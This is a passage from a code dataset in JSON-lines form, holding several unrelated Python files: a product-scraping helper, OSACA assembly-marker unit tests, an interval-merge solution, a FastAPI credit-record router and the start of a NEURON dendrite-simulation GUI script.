мес.\",\n \"large_image\": \"Фото\"\n }\n for rule in rules.keys():\n dict_good_props[rule] = rules[rule]\n\n main_props = {}\n for propty in dict_good_props:\n main_props[rules[propty]] = props[propty]\n options = props[\"options\"]\n new_options = {}\n counter = 0\n\n for option in options:\n new_options[option[\"name\"]] = option[\"value\"]\n counter += 1\n main_props.update(new_options)\n print(main_props)\n return main_props\n\n\ndef get_ID(product):\n return product[\"productID\"]\n\n\ndef get_IDs(products_list):\n list_of_IDs = []\n for product in products_list:\n list_of_IDs.append(product[\"productID\"])\n return list_of_IDs\n\n\ndef get_IDs_of_category(category_number, SID):\n req_of_category = requests.get(URL + \"products/\" +\n str(category_number)+\"/\"+SID).content\n json_of_category = json.loads(req_of_category)[\"result\"][\"list\"]\n list_of_IDs = get_IDs(json_of_category)\n return list_of_IDs\n\n\ndef category_to_json(category_number, SID):\n dict_of_info = {}\n c = 0\n for product_ID in get_IDs_of_category(category_number, SID):\n props = good_view(get_props(product_ID, SID))\n # TODO statistics()\n name = \"rootID\"\n dict_of_info[name] = props\n c += 1\n if c == 20:\n return dict_of_info\n break\n\n\n# def get_product(ID, SID):\n\n\n# def props_to_table(props, line):\n# with open(\"Z:\\Repositories\\testrepo1\\Work\\1\\xl_test.xls\",\"a\")\n", "repo_name": "Casy7/ONU_projects", "sub_path": "Work/1/functions.py", "file_name": "functions.py", "file_ext": "py", "file_size_in_byte": 3129, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.post", "line_number": 13, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 16, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 21, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 22, "usage_type": "call"}, {"api_name": "json.load", "line_number": 32, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 40, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 41, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 88, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 90, "usage_type": "call"}]} +{"seq_id": "2238347698", "text": "#!/usr/bin/env python3\n\"\"\"\nUnit tests for IACA/OSACA marker utilities\n\"\"\"\nimport os\nimport unittest\nfrom collections import OrderedDict\n\nfrom osaca.semantics import (\n reduce_to_section,\n find_basic_blocks,\n find_jump_labels,\n find_basic_loop_bodies,\n)\nfrom osaca.parser import ParserAArch64, ParserX86ATT\n\n\nclass TestMarkerUtils(unittest.TestCase):\n @classmethod\n def setUpClass(self):\n self.parser_AArch = ParserAArch64()\n self.parser_x86 = ParserX86ATT()\n with open(self._find_file(\"triad_arm_iaca.s\")) as f:\n triad_code_arm = f.read()\n with open(self._find_file(\"triad_x86_iaca.s\")) as f:\n triad_code_x86 = f.read()\n self.parsed_AArch = self.parser_AArch.parse_file(triad_code_arm)\n self.parsed_x86 = self.parser_x86.parse_file(triad_code_x86)\n\n #################\n # Test\n #################\n\n def test_marker_detection_AArch64(self):\n kernel = reduce_to_section(self.parsed_AArch, \"AArch64\")\n self.assertEqual(len(kernel), 138)\n self.assertEqual(kernel[0].line_number, 307)\n self.assertEqual(kernel[-1].line_number, 444)\n\n def test_marker_detection_x86(self):\n kernel = reduce_to_section(self.parsed_x86, \"x86\")\n self.assertEqual(len(kernel), 9)\n self.assertEqual(kernel[0].line_number, 146)\n self.assertEqual(kernel[-1].line_number, 154)\n\n def test_marker_matching_AArch64(self):\n # preparation\n bytes_1_line = \".byte 213,3,32,31\\n\"\n bytes_2_lines_1 = \".byte 213,3,32\\n\" + \".byte 31\\n\"\n bytes_2_lines_2 = \".byte 213,3\\n\" + \".byte 32,31\\n\"\n bytes_2_lines_3 = \".byte 213\\n\" + \".byte 3,32,31\\n\"\n bytes_3_lines_1 = \".byte 213,3\\n\" + \".byte 32\\n\" + \".byte 31\\n\"\n bytes_3_lines_2 = \".byte 213\\n\" + \".byte 3,32\\n\" + \".byte 31\\n\"\n bytes_3_lines_3 = \".byte 213\\n\" + \".byte 3\\n\" + \".byte 32,31\\n\"\n bytes_4_lines = \".byte 213\\n\" + \".byte 3\\n\" + \".byte 32\\n\" + \".byte 31\\n\"\n bytes_hex = \".byte 0xd5, 0x3, 0x20, 0x1f\\n\"\n bytes_mixed = \".byte 0xd5\\n.byte 3,0x20\\n.byte 31\\n\"\n mov_start_1 = \"mov x1, #111\\n\"\n mov_start_2 = \"mov x1, 111 // should work as well\\n\"\n mov_end_1 = \"mov x1, #222 // preferred way\\n\"\n mov_end_2 = \"mov x1, 222\\n\"\n prologue = (\n \"mov x12, xzr\\n\"\n + \"\\tldp x9, x10, [sp, #16] // 8-byte Folded Reload\\n\"\n + \" .p2align 6\\n\"\n )\n kernel = (\n \".LBB0_28:\\n\"\n + \"fmul v7.2d, v7.2d, v19.2d\\n\"\n + \"stp q0, q1, [x10, #-32]\\n\"\n + \"b.ne .LBB0_28\\n\"\n )\n epilogue = \".LBB0_29: // Parent Loop BB0_20 Depth=1\\n\" + \"bl dummy\\n\"\n kernel_length = len(list(filter(None, kernel.split(\"\\n\"))))\n\n bytes_variations = [\n bytes_1_line,\n bytes_2_lines_1,\n bytes_2_lines_2,\n bytes_2_lines_3,\n bytes_3_lines_1,\n bytes_3_lines_2,\n bytes_3_lines_3,\n bytes_4_lines,\n bytes_hex,\n bytes_mixed,\n ]\n mov_start_variations = [mov_start_1, mov_start_2]\n mov_end_variations = [mov_end_1, mov_end_2]\n # actual tests\n for mov_start_var in mov_start_variations:\n for bytes_var_1 in bytes_variations:\n for mov_end_var in mov_end_variations:\n for bytes_var_2 in bytes_variations:\n sample_code = (\n prologue\n + mov_start_var\n + bytes_var_1\n + kernel\n + mov_end_var\n + bytes_var_2\n + epilogue\n )\n with self.subTest(\n mov_start=mov_start_var,\n bytes_start=bytes_var_1,\n mov_end=mov_end_var,\n bytes_end=bytes_var_2,\n ):\n sample_parsed = self.parser_AArch.parse_file(sample_code)\n sample_kernel = reduce_to_section(sample_parsed, \"AArch64\")\n self.assertEqual(len(sample_kernel), kernel_length)\n kernel_start = len(\n list(\n filter(\n None,\n (prologue + mov_start_var + bytes_var_1).split(\"\\n\"),\n )\n )\n )\n parsed_kernel = self.parser_AArch.parse_file(\n kernel, start_line=kernel_start\n )\n self.assertEqual(sample_kernel, parsed_kernel)\n\n def test_marker_matching_x86(self):\n # preparation\n bytes_1_line = \".byte 100,103,144\\n\"\n bytes_2_lines_1 = \".byte 100,103\\n\" + \".byte 144\\n\"\n bytes_2_lines_2 = \".byte 100\\n\" + \".byte 103,144\\n\"\n bytes_3_lines = (\n \".byte 100 # IACA MARKER UTILITY\\n\"\n + \".byte 103 # IACA MARKER UTILITY\\n\"\n + \".byte 144 # IACA MARKER UTILITY\\n\"\n )\n bytes_hex_line = \".byte 0x64,0x67,0x90\\n\"\n bytes_mixed = \".byte 0x64 # MARKER\\n .byte 103,0x90 # ANOTHER MARKER\\n\"\n mov_start_1 = \"movl $111, %ebx # IACA START\\n\"\n mov_start_2 = \"mov $111, %ebx # IACA START\\n\"\n mov_end_1 = \"movl $222, %ebx # IACA END\\n\"\n mov_end_2 = \"mov $222, %ebx # IACA END\\n\"\n prologue = \"movl -92(%rbp), %r11d\\n\" + \"movl $111, %ebx\\n\"\n kernel = (\n \"vfmadd132sd (%r15,%rcx,8), %xmm5, %xmm0\\n\"\n + \"vmovsd %xmm0, (%r14,%rcx,8)\\n\"\n + \"cmpl %ebx, %ecx\\n\"\n + \"jge .L8\\n\"\n )\n epilogue = \".LE9:\\t\\t#12.2\\n\" \"call dummy\\n\"\n kernel_length = len(list(filter(None, kernel.split(\"\\n\"))))\n\n bytes_variations = [\n bytes_1_line,\n bytes_2_lines_1,\n bytes_2_lines_2,\n bytes_3_lines,\n bytes_hex_line,\n bytes_mixed,\n ]\n mov_start_variations = [mov_start_1, mov_start_2]\n mov_end_variations = [mov_end_1, mov_end_2]\n # actual tests\n for mov_start_var in mov_start_variations:\n for bytes_var_1 in bytes_variations:\n for mov_end_var in mov_end_variations:\n for bytes_var_2 in bytes_variations:\n sample_code = (\n prologue\n + mov_start_var\n + bytes_var_1\n + kernel\n + mov_end_var\n + bytes_var_2\n + epilogue\n )\n with self.subTest(\n mov_start=mov_start_var,\n bytes_start=bytes_var_1,\n mov_end=mov_end_var,\n bytes_end=bytes_var_2,\n ):\n sample_parsed = self.parser_x86.parse_file(sample_code)\n sample_kernel = reduce_to_section(sample_parsed, \"x86\")\n self.assertEqual(len(sample_kernel), kernel_length)\n kernel_start = len(\n list(\n filter(\n None,\n (prologue + mov_start_var + bytes_var_1).split(\"\\n\"),\n )\n )\n )\n parsed_kernel = self.parser_x86.parse_file(\n kernel, start_line=kernel_start\n )\n self.assertEqual(sample_kernel, parsed_kernel)\n\n def test_marker_special_cases_AArch(self):\n bytes_line = \".byte 213,3,32,31\\n\"\n start_marker = \"mov x1, #111\\n\" + bytes_line\n end_marker = \"mov x1, #222\\n\" + bytes_line\n prologue = \"dup v0.2d, x14\\n\" \"neg x9, x9\\n\" \".p2align 6\\n\"\n kernel = (\n \".LBB0_28:\\n\"\n + \"fmul v7.2d, v7.2d, v19.2d\\n\"\n + \"stp q0, q1, [x10, #-32]\\n\"\n + \"b.ne .LBB0_28\\n\"\n )\n epilogue = \".LBB0_29: // Parent Loop BB0_20 Depth=1\\n\" \"bl dummy\\n\"\n\n samples = [\n # (test name,\n # ignored prologue, section to be extraced, ignored epilogue)\n (\"markers\", prologue + start_marker, kernel, end_marker + epilogue),\n (\"marker at file start\", start_marker, kernel, end_marker + epilogue),\n (\"no start marker\", \"\", prologue + kernel, end_marker + epilogue),\n (\"marker at file end\", prologue + start_marker, kernel, end_marker),\n (\"no end marker\", prologue + start_marker, kernel + epilogue, \"\"),\n (\"empty kernel\", prologue + start_marker, \"\", end_marker + epilogue),\n ]\n\n for test_name, pro, kernel, epi in samples:\n code = pro + kernel + epi\n parsed = self.parser_AArch.parse_file(code)\n test_kernel = reduce_to_section(parsed, \"AArch64\")\n if kernel:\n kernel_length = len(kernel.strip().split(\"\\n\"))\n else:\n kernel_length = 0\n self.assertEqual(\n len(test_kernel),\n kernel_length,\n msg=\"Invalid exctracted kernel length on {!r} sample\".format(test_name),\n )\n if pro:\n kernel_start = len((pro).strip().split(\"\\n\"))\n else:\n kernel_start = 0\n parsed_kernel = self.parser_AArch.parse_file(kernel, start_line=kernel_start)\n self.assertEqual(\n test_kernel,\n parsed_kernel,\n msg=\"Invalid exctracted kernel on {!r}\".format(test_name),\n )\n\n def test_marker_special_cases_x86(self):\n bytes_line = \".byte 100\\n\" \".byte 103\\n\" \".byte 144\\n\"\n start_marker = \"movl $111, %ebx\\n\" + bytes_line\n end_marker = \"movl $222, %ebx\\n\" + bytes_line\n prologue = \"movl -88(%rbp), %r10d\\n\" \"xorl %r11d, %r11d\\n\" \".p2align 4,,10\\n\"\n kernel = (\n \".L3: #L3\\n\"\n \"vmovsd .LC1(%rip), %xmm0\\n\"\n \"vmovsd %xmm0, (%r15,%rcx,8)\\n\"\n \"cmpl %ecx, %ebx\\n\"\n \"jle .L3\\n\"\n )\n epilogue = \"leaq -56(%rbp), %rsi\\n\" \"movl %r10d, -88(%rbp)\\n\" \"call timing\\n\"\n samples = [\n # (test name,\n # ignored prologue, section to be extraced, ignored epilogue)\n (\"markers\", prologue + start_marker, kernel, end_marker + epilogue),\n (\"marker at file start\", start_marker, kernel, end_marker + epilogue),\n (\"no start marker\", \"\", prologue + kernel, end_marker + epilogue),\n (\"marker at file end\", prologue + start_marker, kernel, end_marker),\n (\"no end marker\", prologue + start_marker, kernel + epilogue, \"\"),\n (\"empty kernel\", prologue + start_marker, \"\", end_marker + epilogue),\n ]\n\n for test_name, pro, kernel, epi in samples:\n code = pro + kernel + epi\n parsed = self.parser_x86.parse_file(code)\n test_kernel = reduce_to_section(parsed, \"x86\")\n if kernel:\n kernel_length = len(kernel.strip().split(\"\\n\"))\n else:\n kernel_length = 0\n self.assertEqual(\n len(test_kernel),\n kernel_length,\n msg=\"Invalid exctracted kernel length on {!r} sample\".format(test_name),\n )\n if pro:\n kernel_start = len((pro).strip().split(\"\\n\"))\n else:\n kernel_start = 0\n parsed_kernel = self.parser_x86.parse_file(kernel, start_line=kernel_start)\n self.assertEqual(\n test_kernel,\n parsed_kernel,\n msg=\"Invalid exctracted kernel on {!r}\".format(test_name),\n )\n\n def test_find_jump_labels(self):\n self.assertEqual(\n find_jump_labels(self.parsed_x86),\n OrderedDict(\n [\n (\".LFB24\", 10),\n (\".L4\", 65),\n (\".L3\", 79),\n (\".L2\", 102),\n (\".L13\", 111),\n (\".L12\", 120),\n (\".L6\", 132),\n (\".L10\", 145),\n (\".L9\", 161),\n (\".L8\", 183),\n (\".L15\", 252),\n (\".L26\", 256),\n (\".L14\", 259),\n (\".LFB25\", 277),\n (\".L28\", 289),\n ]\n ),\n )\n\n self.assertEqual(\n find_jump_labels(self.parsed_AArch),\n OrderedDict(\n [\n (\"triad\", 18),\n (\".LBB0_3\", 71),\n (\".LBB0_4\", 76),\n (\".LBB0_5\", 84),\n (\".LBB0_7\", 92),\n (\".LBB0_8\", 95),\n (\".LBB0_9\", 106),\n (\".LBB0_11\", 118),\n (\".LBB0_12\", 133),\n (\".LBB0_14\", 177),\n (\".LBB0_15\", 190),\n (\".LBB0_16\", 205),\n (\".LBB0_17\", 208),\n (\".LBB0_18\", 221),\n (\".LBB0_19\", 228),\n (\".LBB0_20\", 260),\n (\".LBB0_22\", 272),\n (\".LBB0_24\", 283),\n (\".LBB0_26\", 290),\n (\".LBB0_28\", 298),\n (\".LBB0_29\", 306),\n (\".LBB0_31\", 448),\n (\".LBB0_32\", 458),\n (\".LBB0_33\", 480),\n (\".LBB0_34\", 484),\n (\".LBB0_35\", 493),\n (\".LBB0_36\", 504),\n (\".LBB0_37\", 508),\n (\".LBB0_38\", 518),\n (\"main\", 574),\n ]\n ),\n )\n\n def test_find_basic_blocks(self):\n self.assertEqual(\n [\n (k, v[0][\"line_number\"], v[-1][\"line_number\"])\n for k, v in find_basic_blocks(self.parsed_x86).items()\n ],\n [\n (\".LFB24\", 11, 56),\n (\".L4\", 66, 74),\n (\".L3\", 80, 89),\n (\".L2\", 103, 112),\n (\".L13\", 112, 121),\n (\".L12\", 121, 125),\n (\".L6\", 133, 135),\n (\".L10\", 146, 154),\n (\".L9\", 162, 170),\n (\".L8\", 184, 187),\n (\".L15\", 253, 256),\n (\".L26\", 257, 259),\n (\".L14\", 260, 262),\n (\".LFB25\", 278, 290),\n (\".L28\", 290, 300),\n ],\n )\n\n self.assertEqual(\n [\n (k, v[0][\"line_number\"], v[-1][\"line_number\"])\n for k, v in find_basic_blocks(self.parsed_AArch).items()\n ],\n [\n (\"triad\", 19, 64),\n (\".LBB0_3\", 72, 77),\n (\".LBB0_4\", 77, 83),\n (\".LBB0_5\", 85, 89),\n (\".LBB0_7\", 93, 95),\n (\".LBB0_8\", 96, 105),\n (\".LBB0_9\", 107, 114),\n (\".LBB0_11\", 119, 134),\n (\".LBB0_12\", 134, 173),\n (\".LBB0_14\", 178, 191),\n (\".LBB0_15\", 191, 205),\n (\".LBB0_16\", 206, 208),\n (\".LBB0_17\", 209, 222),\n (\".LBB0_18\", 222, 228),\n (\".LBB0_19\", 229, 261),\n (\".LBB0_20\", 261, 269),\n (\".LBB0_22\", 273, 280),\n (\".LBB0_24\", 284, 286),\n (\".LBB0_26\", 291, 293),\n (\".LBB0_28\", 299, 307),\n (\".LBB0_29\", 307, 444),\n (\".LBB0_31\", 449, 459),\n (\".LBB0_32\", 459, 480),\n (\".LBB0_33\", 481, 484),\n (\".LBB0_34\", 485, 494),\n (\".LBB0_35\", 494, 504),\n (\".LBB0_36\", 505, 508),\n (\".LBB0_37\", 509, 518),\n (\".LBB0_38\", 519, 568),\n (\"main\", 575, 590),\n ],\n )\n\n def test_find_basic_loop_body(self):\n self.assertEqual(\n [\n (k, v[0][\"line_number\"], v[-1][\"line_number\"])\n for k, v in find_basic_loop_bodies(self.parsed_x86).items()\n ],\n [(\".L4\", 66, 74), (\".L10\", 146, 154), (\".L28\", 290, 300)],\n )\n\n self.assertEqual(\n [\n (k, v[0][\"line_number\"], v[-1][\"line_number\"])\n for k, v in find_basic_loop_bodies(self.parsed_AArch).items()\n ],\n [\n (\".LBB0_12\", 134, 173),\n (\".LBB0_15\", 191, 205),\n (\".LBB0_18\", 222, 228),\n (\".LBB0_29\", 307, 444),\n (\".LBB0_32\", 459, 480),\n (\".LBB0_35\", 494, 504),\n ],\n )\n\n ##################\n # Helper functions\n ##################\n\n @staticmethod\n def _find_file(name):\n testdir = os.path.dirname(__file__)\n name = os.path.join(testdir, \"test_files\", name)\n assert os.path.exists(name)\n return name\n\n\nif __name__ == \"__main__\":\n suite = unittest.TestLoader().loadTestsFromTestCase(TestMarkerUtils)\n unittest.TextTestRunner(verbosity=2).run(suite)\n", "repo_name": "RRZE-HPC/OSACA", "sub_path": "tests/test_marker_utils.py", "file_name": "test_marker_utils.py", "file_ext": "py", "file_size_in_byte": 18012, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 251, "dataset": "github-code", "pt": "53", "api": [{"api_name": "unittest.TestCase", "line_number": 18, "usage_type": "attribute"}, {"api_name": "osaca.parser.ParserAArch64", "line_number": 21, "usage_type": "call"}, {"api_name": "osaca.parser.ParserX86ATT", "line_number": 22, "usage_type": "call"}, {"api_name": "osaca.semantics.reduce_to_section", "line_number": 35, "usage_type": "call"}, {"api_name": "osaca.semantics.reduce_to_section", "line_number": 41, "usage_type": "call"}, {"api_name": "osaca.semantics.reduce_to_section", "line_number": 111, "usage_type": "call"}, {"api_name": "osaca.semantics.reduce_to_section", "line_number": 183, "usage_type": "call"}, {"api_name": "osaca.semantics.reduce_to_section", "line_number": 225, "usage_type": "call"}, {"api_name": "osaca.semantics.reduce_to_section", "line_number": 273, "usage_type": "call"}, {"api_name": "osaca.semantics.find_jump_labels", "line_number": 296, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 297, "usage_type": "call"}, {"api_name": "osaca.semantics.find_jump_labels", "line_number": 319, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 320, "usage_type": "call"}, {"api_name": "osaca.semantics.find_basic_blocks", "line_number": 360, "usage_type": "call"}, {"api_name": "osaca.semantics.find_basic_blocks", "line_number": 384, "usage_type": "call"}, {"api_name": "osaca.semantics.find_basic_loop_bodies", "line_number": 424, "usage_type": "call"}, {"api_name": "osaca.semantics.find_basic_loop_bodies", "line_number": 432, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 450, "usage_type": "call"}, {"api_name": "os.path", "line_number": 450, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 451, "usage_type": "call"}, {"api_name": "os.path", "line_number": 451, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 452, "usage_type": "call"}, {"api_name": "os.path", "line_number": 452, "usage_type": "attribute"}, {"api_name": "unittest.TestLoader", "line_number": 457, "usage_type": "call"}, {"api_name": "unittest.TextTestRunner", "line_number": 458, "usage_type": "call"}]} +{"seq_id": "36993405869", "text": "from typing import List\n\nclass Solution:\n def merge(self, intervals: List[List[int]]) -> List[List[int]]:\n stack = []\n intervals.sort(key= lambda i : i[0])\n\n for time in intervals:\n if len(stack) == 0:\n stack.append(time)\n else:\n if time[0] <= stack[-1][1]:\n previous = stack.pop()\n maxEnd = max(time[1], previous[1])\n stack.append([previous[0], maxEnd])\n else:\n stack.append(time)\n return stack\n\nif __name__ == \"__main__\":\n arr = [[1,4],[0,4]]\n sol = Solution()\n sol.merge(arr)", "repo_name": "sumanshil/TopCoder", "sub_path": "TopCoder/python/arr/PythonSimpleStackSolution.py", "file_name": "PythonSimpleStackSolution.py", "file_ext": "py", "file_size_in_byte": 661, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.List", "line_number": 4, "usage_type": "name"}]} +{"seq_id": "18510391664", "text": "from fastapi import APIRouter\nfrom fastapi import Path, Query, Depends\nfrom fastapi.responses import JSONResponse\nfrom pydantic import BaseModel, Field\nfrom typing import Optional, List\nfrom config.database import Session\nfrom models.credito import Credito as CreditModel\nfrom fastapi.encoders import jsonable_encoder\nfrom middlewares.jwt_bearer import JWTBearer\nfrom services.credito import CrediService\nfrom schemas.credito import Credito\n\nmovie_router = APIRouter()\n\n@movie_router.get(\n path='/credits',\n tags=['Credit'],\n summary=\"Show all credits\",\n response_model=List[Credito],\n status_code=200,\n dependencies= [Depends(JWTBearer())])\ndef get_movies() -> List[Credito]:\n db = Session()\n result = CrediService(db).get_creditos()\n return JSONResponse(status_code=200, content=jsonable_encoder(result)) \n\n@movie_router.get('/credits/{id}', \n tags=['Credit'],\n summary=\"Obtener crédito por ID\",\n response_model=Credito,\n status_code=200)\ndef get_movie(id: int = Path(ge=1, le=2000)) -> Credito:\n db = Session()\n result = CrediService(db).get_credito(id)\n if not result:\n return JSONResponse(status_code=404, content={'message':'Cliente no registrado'})\n return JSONResponse(status_code=200, content=jsonable_encoder(result))\n\n@movie_router.post(\n path='/credits',\n tags=['Credit'],\n summary=\"Crear a registro de crédito.\",\n response_model=dict,\n status_code=201)\ndef create_movie(credit: Credito) -> dict:\n db = Session()\n CrediService(db).create_credito(credit)\n return JSONResponse(status_code=201,content={\"message\":\"Tú crédito ha sido registrado con éxito\"})\n\n@movie_router.put(\n path='/credits/{id}',\n tags=['Credit'],\n summary=\"Modificar crédito\",\n response_model=dict,\n status_code=200)\ndef update_movies(id:int, credit: Credito) -> dict:\n db = Session()\n result = CrediService(db).get_credito(id)\n if not result:\n return JSONResponse(status_code=404, content={'message':'Cliente no registrado'})\n CrediService(db).update_credito(id, credit)\n return JSONResponse(status_code=200, content={\"message\":\"Crédito actualizado\"}) \n \n@movie_router.delete(\n path='/credits/{id}',\n tags=['Credit'],\n summary=\"Delete a credit with the ID\",\n response_model=dict,\n status_code=200)\ndef delete_movie(id: int) -> dict:\n db = Session()\n result : CreditModel = db.query(CreditModel).filter(CreditModel.id == id).first()\n if not result:\n return JSONResponse(status_code=404, content={'message':'Cliente no registrado'})\n CrediService(db).delete_credito(id)\n return JSONResponse(status_code=200,content={\"message\":\"Crédito eliminado\"})", "repo_name": "chechorios2008/FastAPI-with-SQL", "sub_path": "routers/credito.py", "file_name": "credito.py", "file_ext": "py", "file_size_in_byte": 2712, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "fastapi.APIRouter", "line_number": 13, "usage_type": "call"}, {"api_name": "config.database.Session", "line_number": 23, "usage_type": "call"}, {"api_name": "services.credito.CrediService", "line_number": 24, "usage_type": "call"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 25, "usage_type": "call"}, {"api_name": "fastapi.encoders.jsonable_encoder", "line_number": 25, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 19, "usage_type": "name"}, {"api_name": "schemas.credito.Credito", "line_number": 19, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 21, "usage_type": "call"}, {"api_name": "middlewares.jwt_bearer.JWTBearer", "line_number": 21, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 22, "usage_type": "name"}, {"api_name": "schemas.credito.Credito", "line_number": 22, "usage_type": "name"}, {"api_name": "fastapi.Path", "line_number": 32, "usage_type": "call"}, {"api_name": "config.database.Session", "line_number": 33, "usage_type": "call"}, {"api_name": "services.credito.CrediService", "line_number": 34, "usage_type": "call"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 36, "usage_type": "call"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 37, "usage_type": "call"}, {"api_name": "fastapi.encoders.jsonable_encoder", "line_number": 37, "usage_type": "call"}, {"api_name": "schemas.credito.Credito", "line_number": 30, "usage_type": "name"}, {"api_name": "schemas.credito.Credito", "line_number": 32, "usage_type": "name"}, {"api_name": "schemas.credito.Credito", "line_number": 45, "usage_type": "name"}, {"api_name": "config.database.Session", "line_number": 46, "usage_type": "call"}, {"api_name": "services.credito.CrediService", "line_number": 47, "usage_type": "call"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 48, "usage_type": "call"}, {"api_name": "schemas.credito.Credito", "line_number": 56, "usage_type": "name"}, {"api_name": "config.database.Session", "line_number": 57, "usage_type": "call"}, {"api_name": "services.credito.CrediService", "line_number": 58, "usage_type": "call"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 60, "usage_type": "call"}, {"api_name": "services.credito.CrediService", "line_number": 61, "usage_type": "call"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 62, "usage_type": "call"}, {"api_name": "config.database.Session", "line_number": 71, "usage_type": "call"}, {"api_name": "models.credito.Credito", "line_number": 72, "usage_type": "name"}, {"api_name": "models.credito.Credito.id", "line_number": 72, "usage_type": "attribute"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 74, "usage_type": "call"}, {"api_name": "services.credito.CrediService", "line_number": 75, "usage_type": "call"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "22642925642", "text": "from __future__ import division\nfrom collections import OrderedDict\nimport sys, pdb, matplotlib, os\nimport numpy as np\n\nos.chdir('../function_scripts')\nfrom neuron import gui,h\nmatplotlib.use(\"TkAgg\")\n\nos.chdir('../function_scripts')\nimport synapse_functions\n\n# Keep at end of imports\nfrom CableGUI import *\nfrom Simulators import *\n\n# =========================== Updates Functions (connection between GUI and Simulator) ===========================\ndef UpdateEntryParams(Simulator, GUI):\n\n\t'''\n\tUpdate parameters according to values in Entries. This is used once upon initialization of the GUI (when mode==\n\t'initialized'), and then again each time there is an update to one or more of the GUI features (mode=='update').\n\n\tUses global variables:\n\t\t\tExample: {'simulation': {'attribute': value}, \n\t\t\t\t\t 'synapses': {'exc': {'attribute': value}, 'inh': {'attribute': value}}, \n\t\t\t\t\t etc.}\n\t\t- Simulator: Simulators object that is updated according to user choices\n\t\t- GUI: GUI object through which user makes choices\n\t'''\n\n\tall_dict = {}\n\tall_dict.update(GUI.Entries['simulation'])\n\tall_dict.update(GUI.Entries['synapse_exc'])\n\tall_dict.update(GUI.Entries['synapse_inh'])\n\tif Simulator.soma:\n\t\tall_dict.update(GUI.Entries['soma'])\n\tif Simulator.spines_exist:\n\t\tall_dict.update(GUI.Entries['spines'])\n\n\tfor item in all_dict:\n\t\ttemp_val = all_dict[item]['Var'].get()\n\t\t# Set Simulator properties\n\t\tif 'h.' not in item:\n\t\t\ttry:\n\t\t\t\texec('Simulator.' + item + \" = %s\"%float(temp_val))\n\t\t\texcept:\n\t\t\t\texec('Simulator.' + item + \" = \\'%s\\'\"%temp_val)\n\n\t\t# Set simulation parameters (inside hoc interpreter(=h))\n\t\telif 'h.' in item:\t\t\t\t\n\t\t\texec(item + \" = %s\"%float(temp_val))\n\n\t# Set spine parameters manually\n\tif Simulator.spines_exist:\n\t\tSimulator.UpdateSpineParams('neck', diam = Simulator.neck_diam,\n\t\t\t\t\t\t\t\t\t\t\tL = Simulator.neck_L,\n\t\t\t\t\t\t\t\t\t\t\tRa = Simulator.neck_Ra)\n\t\tSimulator.UpdateSpineParams('head', diam = Simulator.head_radius*2,\n\t\t\t\t\t\t\t\t\t\t\tL = Simulator.head_radius*2)\n\n\t# Set synapse parameters manually\n\texc_tstart = Simulator.t_start\n\tinh_tstart = exc_tstart + Simulator.dEI\n\tfor att in ['exc_tstart', 'inh_tstart']:\n\t\tsetattr(synapse_functions, att, eval(att))\n\ndef UpdateSynLocs():\n\n\tsynapse_filled_length = Simulator.dend.L - Simulator.start_syns\n\t\n\texc_start = Simulator.start_syns\n\texc_dist = GUI.Entries['synapse_exc']['exc_dist']['Var'].get()\n\tSimulator.CreateSynLocs('exc', exc_start, synapse_filled_length, Simulator.exc_dense, Simulator.dend.L, Simulator.exc_locs, dist_ = exc_dist)\n\n\tinh_start = Simulator.start_syns\n\tinh_dist = GUI.Entries['synapse_inh']['inh_dist']['Var'].get()\n\tSimulator.CreateSynLocs('inh', inh_start, synapse_filled_length, Simulator.inh_dense, Simulator.dend.L, Simulator.inh_locs, dist_ = inh_dist)\n\ndef UpdateErrorLabel(error_dict, error_msg=None):\n\tlabel = error_dict['Label']\n\tvar = error_dict['Var']\n\t\n\tif error_msg:\n\t\tif 'Warning' in error_msg:\n\t\t\tvar.set(error_msg)\n\t\t\tlabel['fg'] = 'darkorange'\n\t\telif 'Error' in error_msg:\n\t\t\tvar.set(error_msg)\n\t\t\tlabel['fg'] = 'red'\n\t\telse:\n\t\t\tvar.set(error_msg)\n\t\t\tlabel['fg'] = 'blue'\n\telse:\n\t\tvar.set('No error. Good!')\n\t\tlabel['fg'] = 'green'\n\ndef UpdatePresentedValues(labels_dict):\n\tlambda_ = Simulator.Calculate('lambda', Simulator.dend)\n\tlabels_dict['lambda']['Var'].set(u\"\\u03BB = %.2f cm = %.2f \\u03BCm\"%(lambda_, lambda_*1e4))\n\tlabels_dict['Ri']['Var'].set(u\"R\\u1d62 = %.2f M\\u2126\"%Simulator.Calculate('Rinput', Simulator.dend))\n\tlabels_dict['n_exc']['Var'].set(u\"N\\u2091\\u2093 = %i\"%Simulator.n_exc)\n\tlabels_dict['n_inh']['Var'].set(u\"N\\u2091\\u2093 = %i\"%Simulator.n_inh)\n\n# ================================= Callback Functions (everything user can activate) =================================\ndef AddSpines_callback(mode='button_callback'):\n\n\t# !! Check if adding spines when dist_='Freeze' keeps synapse locations and just puts spines there\n\tUpdateEntryParams(Simulator, GUI)\n\tUpdateSynLocs()\n\n\tif Simulator.spines_exist: # Either in the case of removing spines or just updating location (will be False for adding new 